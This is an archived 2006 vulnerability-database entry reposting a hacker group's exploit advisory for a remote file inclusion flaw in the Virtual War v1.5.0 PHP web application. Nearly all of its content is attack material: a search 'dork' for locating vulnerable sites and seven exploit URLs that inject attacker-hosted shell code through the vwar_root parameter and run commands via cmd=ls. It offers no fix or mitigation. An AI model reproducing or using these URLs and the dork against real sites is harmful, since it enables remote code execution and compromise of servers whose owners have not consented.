Virtual War v1.5.0 Remote File Include (vwar_root)

2006-08-08T00:00:00
ID SECURITYVULNS:DOC:13784
Type securityvulns
Reporter Securityvulns
Modified 2006-08-08T00:00:00

Description

Title : Virtual War v1.5.0 Remote File Include (vwar_root)

Discovered By :::: :::: :::: AG-Spider :::: :::: ::::


Class : Remote file include Rish : Danger Application : Virtual War v1.5.0 URL : www.vwar.de


dork : Powered by: Virtual War v1.5.0

Exploit :
http://www.$ite.com/[vwar_path]/war.php?vwar_root=[Shell-code]?&cmd=ls

http://www.$ite.com/[vwar_path]/member.php?vwar_root=[Shell-code]?&cmd=ls

http://www.$ite.com/[vwar_path]/calendar.php?vwar_root=[Shell-code]?&cmd=ls

http://www.$ite.com/[vwar_path]/challenge.php?vwar_root=[Shell-code]?&cmd=ls

http://www.$ite.com/[vwar_path]/joinus.php?vwar_root=[Shell-code]?&cmd=ls

http://www.$ite.com/[vwar_path]news.php?vwar_root=[Shell-code]?&cmd=ls

http://www.$ite.com/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls


The Arab Warriors Security Team - - -[T-A-W-S-T] - - - Muslims Hackers

greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy - CrAsH_oVeR_rIdE]

c0natct us : AG-Spider [ at ] HoTMail.CoM thx 2 :::::: Lezr.com & 3asfh.net


Download the new Windows Live Toolbar, including Desktop search! http://toolbar.live.com/?mkt=en-gb